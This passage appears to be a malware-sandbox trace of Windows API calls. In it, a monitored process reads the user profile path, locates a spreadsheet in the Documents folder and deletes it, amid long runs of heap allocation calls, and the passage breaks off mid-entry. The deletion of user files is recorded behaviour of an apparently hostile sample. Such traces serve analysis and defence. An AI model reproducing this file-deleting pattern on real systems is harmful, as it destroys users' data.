[0268.682] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0268.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0268.682] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0268.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0268.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0268.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0268.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0268.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0268.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0268.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0268.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0268.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51718 [0268.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51730 [0268.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51898 [0268.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0268.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517a8 [0268.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0268.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0268.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51808 [0268.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0268.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0268.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0268.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0268.683] CloseHandle (hObject=0x2d0) returned 1 [0268.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0268.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0268.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0268.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0268.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0268.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0268.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0268.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0268.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0268.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0268.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0268.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0268.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0268.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0268.685] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0268.685] CloseHandle (hObject=0x2a0) returned 1 [0268.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0268.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0268.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be08a8 | out: hHeap=0x970000) returned 1 [0268.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0268.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0268.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0268.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0268.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0268.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0268.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0268.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0268.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0268.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0268.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0268.699] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.700] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0268.700] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0268.700] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/zP4h.xlsx", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\zP4h.xlsx", lpFilePart=0x8cedf4*="zP4h.xlsx") returned 0x23 [0268.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0268.700] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\zP4h.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\zp4h.xlsx")) returned 0x20 [0268.701] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\zP4h.xlsx", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb93d9c80, ftCreationTime.dwHighDateTime=0x1d59d68, ftLastAccessTime.dwLowDateTime=0xd7de4a50, ftLastAccessTime.dwHighDateTime=0x1d5c94a, ftLastWriteTime.dwLowDateTime=0xd7de4a50, ftLastWriteTime.dwHighDateTime=0x1d5c94a, nFileSizeHigh=0x0, nFileSizeLow=0x4dbb, dwReserved0=0x1, dwReserved1=0x1c, cFileName="zP4h.xlsx", cAlternateFileName="ZP4H~1.XLS")) returned 0xa87250 [0268.701] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\zP4h.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\zp4h.xlsx")) returned 1 [0268.711] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb93d9c80, ftCreationTime.dwHighDateTime=0x1d59d68, ftLastAccessTime.dwLowDateTime=0xd7de4a50, ftLastAccessTime.dwHighDateTime=0x1d5c94a, ftLastWriteTime.dwLowDateTime=0xd7de4a50, ftLastWriteTime.dwHighDateTime=0x1d5c94a, nFileSizeHigh=0x0, nFileSizeLow=0x4dbb, dwReserved0=0x1, dwReserved1=0x1c, cFileName="zP4h.xlsx", cAlternateFileName="ZP4H~1.XLS")) returned 0 [0268.711] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0268.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0268.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0268.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0268.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0268.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0268.712] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0268.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0268.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0268.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0268.712] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0268.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0268.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0268.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0268.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0268.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0268.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0268.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0268.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0268.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0268.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0268.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0268.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0268.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0268.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0268.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0268.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0268.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0268.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0268.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0268.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0268.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0268.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x48) returned 0x2e558d8 [0268.713] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/zP4h.xlsx", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\zP4h.xlsx", lpFilePart=0x8cf650*="zP4h.xlsx") returned 0x23 [0268.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0268.713] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\zP4h.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\zp4h.xlsx")) returned 0xffffffff [0268.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0268.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0268.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0268.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0268.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0268.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0268.713] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0268.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0268.713] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0268.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0268.713] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0268.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0268.713] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0268.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0268.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0268.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0268.714] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0268.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0268.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0268.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0268.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c28 [0268.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0268.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0268.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0268.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0268.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0268.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c68 [0268.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0268.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0268.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0268.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0268.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c18 [0268.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0268.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0268.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0268.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51490 [0268.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0268.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0268.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0268.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0268.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0268.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0268.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0268.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0268.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0268.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0268.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0268.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0268.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0268.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0268.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0268.715] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0268.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0268.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0268.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0268.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0268.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0268.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0268.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0268.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0268.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0268.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0268.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0268.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0268.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0268.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0268.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0268.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0268.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0268.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0268.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0268.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0268.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0268.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0268.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0268.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0268.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0268.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0268.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0268.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0268.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0268.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0268.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0268.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0268.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0268.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0268.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0268.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0268.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0268.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0268.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0268.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0268.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0268.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0268.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0268.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0268.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0268.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0268.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0268.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0268.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0268.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0268.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0268.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0268.717] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0268.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0268.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0268.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0268.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0268.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0268.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0268.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0268.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0268.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0268.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0268.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0268.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0268.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0268.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0268.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0268.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0268.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0268.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0268.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/]+\\z", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0268.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9) returned 0x2e51a48 [0268.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/]+\\z", cchWideChar=9, lpMultiByteStr=0x2e51a48, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\\\\/]+\\z", 